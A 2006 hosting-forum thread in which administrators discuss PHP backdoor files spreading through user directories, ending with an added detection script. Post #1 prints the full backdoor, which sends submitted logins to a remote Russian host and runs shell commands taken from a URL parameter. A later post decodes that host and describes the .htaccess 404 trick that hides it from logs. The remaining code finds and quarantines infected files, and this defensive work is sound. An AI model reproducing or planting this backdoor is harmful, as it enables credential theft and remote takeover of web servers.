02-08-2006, 11:05 PM #1 Newbie (Virginia Beach, VA)
New Vulnerabilities - Scary PHP Files ALL Over the Server
Not sure if any of you may have fallen to the same issues yet, but I'd recommend you do a "locate" or find of some files...here are some examples:
options.php
layout.php
configs.php
base.php
time.php
date.php
tests.php
fsav.php
There's plenty more out there. These files all contain some dirty code...here's an example:
Code:
```php
<?php
error_reporting(0);
// Any l/p (login/password) fields posted to the page are forwarded to the remote host.
if (isset($_POST["l"]) and isset($_POST["p"])) {
    if (isset($_POST["input"])) {
        $user_auth = "&l=" . base64_encode($_POST["l"]) . "&p=" . base64_encode(md5($_POST["p"]));
    } else {
        $user_auth = "&l=" . $_POST["l"] . "&p=" . $_POST["p"];
    }
} else {
    $user_auth = "";
}
if (!isset($_POST["log_flg"])) {
    $log_flg = "&log";
}
// The base64 literal is a remote URL; the client IP and the requested URL are appended
// and the result is pulled in with include_once (only works where PHP allows URL includes).
if (! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9")
        . sprintf("%u", ip2long(getenv(REMOTE_ADDR)))
        . "&url=" . base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI])
        . $user_auth . $log_flg)) {
    // Fallback when the remote include fails: run a command taken from the query
    // string, or report the kernel version.
    if (isset($_GET["a3kfj39fsj2"])) {
        system($_GET["a3kfj39fsj2"]);
    }
    if ($_POST["l"] == "special") {
        print "sys_active" . `uname -a`;
    }
}
?>
```
These files will INFEST your server. I have found them in almost EVERY user directory; meaning only safe_mode or suPHP could have stopped it. Cleaning them out is so difficult!
I think this problem is related to Gallery. About 10 of my clients reported broken Gallery templates today and then this happened. However, Wordpress templates were also broken, and phpBBfm templates; they are broken on their own.
It seems that the last two weeks has seen a HUGE jump in vulnerabilities...
Anyone else seeing this? Any ideas? Please?
02-08-2006, 11:34 PM #2 Newbie (Virginia Beach, VA)
Oh, and another thing...it also puts a .htaccess inside the directory with these PHP files that calls them on 404, which means you'll NEVER SEE IT in your Apache logs.
02-09-2006, 12:18 AM #3 Newbie (Virginia Beach, VA)
Here, I wrote this to try to find these files quickly...
The only thing it doesn't account for is directories with spaces in the name...
Code:
```sh
updatedb
# Suspect base names seen in the dropped files; each is checked as <name>.php
for problemfiles in time base date tests configs include guest report layout download remote create options messages package properties; do
    # Exact-name matches from the locate db, skipping files already quarantined
    list=`locate $problemfiles.php | grep "\/$problemfiles.php" | grep -v hackers"`
    for i in $list; do
        # Flag the file if it contains base64_encode anywhere
        thecount=`grep base64_encode $i | wc -l`
        if [ $thecount -ne 0 ]; then
            # Rename so Apache stops treating it as PHP
            mv $i $i.hackers
        fi
    done
done
```
If there's a better solution, great...this is the quickest I could come up with.
02-09-2006, 12:38 AM #4 Disabled
Looks like a Gallery exploit. Upgrade your galleries to the latest secure versions. Check out secunia.com for known vulnerabilities. BTW, you may try something like this to find exactly what it does.
```php
<?php
// Decode the base64 literal from the backdoor to see which host it contacts
print(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9"));
?>
```
02-09-2006, 12:43 AM #5 Newbie (Virginia Beach, VA)
Yeah, I tried that, got back that it was contacting:
http://bis.iframe.ru/master.php?r_addr=
Unfortunately, a file_get_contents against it doesn't work. I think the server is down (or overloaded from success of the hack?)
02-09-2006, 08:57 AM #6 Web Hosting Master
Are you using mod_security?
02-09-2006, 09:03 AM #7 Newbie (Virginia Beach, VA)
Yes, I have mod_security loaded with every option I could find on the net except the IP blacklists (too much performance loss).
02-09-2006, 02:50 PM #8 Newbie (Virginia Beach, VA)
Oops! Problem in the code...here's a working version.
Code:
```sh
updatedb
# Suspect base names seen in the dropped files; each is checked as <name>.php
for problemfiles in time base date tests configs include guest report layout download remote create options messages package properties; do
    # Exact-name matches from the locate db, skipping files already quarantined
    list=`locate $problemfiles.php | grep "\/$problemfiles.php" | grep -v hackers`
    for i in $list; do
        # Flag the file if it contains base64_encode anywhere
        thecount=`grep base64_encode $i | wc -l`
        if [ $thecount -ne 0 ]; then
            # Rename so Apache stops treating it as PHP
            mv $i $i.hackers
        fi
    done
done
```
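The following is an added example, not code posted in this thread. It pulls together the cleanup steps the posts describe (the file sweep and rename from posts #3 and #8, the base64 decode from posts #4 and #5, the 404-handler .htaccess trick from post #2) into one find-based script, and goes beyond the posted locate loop in two ways: it matches on two literal fragments of the backdoor quoted in post #1 (`include_once(base64_decode(` and `system($_GET[`) rather than on a fixed list of file names, so a dropper that picks new names is still caught, and it survives spaces in path names. The sample tree it builds when run without arguments is constructed for the demo; the signatures and the base64 literal are the ones from the thread. It assumes GNU find/grep and coreutils base64 (for `grep -o` and `base64 -d`).

```shell
#!/bin/sh
# Added example, not code from the thread: find-based sweep for the dropped
# PHP backdoors. Matches on the backdoor's own code, handles spaces in paths,
# decodes the base64 literal to show the remote host, and flags .htaccess
# files that route 404s to a PHP script. Assumes GNU find/grep and coreutils
# base64.

# Literal substrings taken from the backdoor source quoted in post #1.
SIG_INCLUDE='include_once(base64_decode('   # remote include of attacker code
SIG_SYSTEM='system($_GET['                  # command-execution fallback

# Print the path of every PHP file under $1 that carries either signature.
find_backdoors() {
    find "$1" -type f -name '*.php' \
        \( -exec grep -qF "$SIG_INCLUDE" {} \; -o -exec grep -qF "$SIG_SYSTEM" {} \; \) \
        -print
}

# Print every base64_decode("...") literal in file $1, decoded, one per line.
decode_strings() {
    grep -o 'base64_decode("[A-Za-z0-9+/=]*")' "$1" \
        | sed 's/^base64_decode("//; s/")$//' \
        | while IFS= read -r b64; do
              printf '%s' "$b64" | base64 -d 2>/dev/null
              printf '\n'
          done
}

# Print every .htaccess under $1 whose 404 handler is a PHP script (post #2).
find_404_hooks() {
    find "$1" -type f -name '.htaccess' \
        -exec grep -qiE '^[[:space:]]*ErrorDocument[[:space:]]+404[[:space:]]+.*\.php' {} \; \
        -print
}

# Rename each hit to <name>.hackers so Apache no longer executes it.
# (Newline-delimited paths: fine for spaces, not for names containing newlines.)
quarantine() {
    find_backdoors "$1" | while IFS= read -r f; do
        mv -- "$f" "$f.hackers"
    done
}

# Constructed sample tree so the script runs stand-alone: a clean index.php,
# a cut-down copy of the backdoor in a directory with a space, and a 404 hook.
make_sample() {
    d=$(mktemp -d)
    mkdir -p "$d/public_html/my site"
    printf '%s\n' '<?php echo "hello"; ?>' > "$d/public_html/index.php"
    printf '%s\n' \
        '<?php error_reporting(0);' \
        'if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . "&url=x")) {' \
        '  if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}' \
        '} ?>' > "$d/public_html/my site/base.php"
    printf 'ErrorDocument 404 /my site/base.php\n' > "$d/public_html/my site/.htaccess"
    printf '%s\n' "$d"
}

# Report on the directory given as $1, or on the sample tree when run bare.
# Quarantine is deliberately a separate step: review the list first, then
# call quarantine "$root".
case ${1:-} in
    '') root=$(make_sample); demo=1 ;;
    *)  root=$1; demo= ;;
esac
echo "== PHP files with backdoor signatures under $root"
find_backdoors "$root"
echo "== decoded base64 literals"
find_backdoors "$root" | while IFS= read -r f; do decode_strings "$f"; done
echo "== .htaccess files routing 404s to PHP"
find_404_hooks "$root"
if [ -n "$demo" ]; then rm -rf "$root"; fi
```

Run it as `sh sweep.sh /home` to report on a real docroot; nothing is renamed until `quarantine` is called explicitly, because a grep for `system($_GET[` can also hit legitimate admin scripts and those should be read before being disabled. Renaming to `.hackers` is the same approach as the posted script; `chmod 000` would work too, but the rename makes the files disappear from later sweeps and keeps them for forensics.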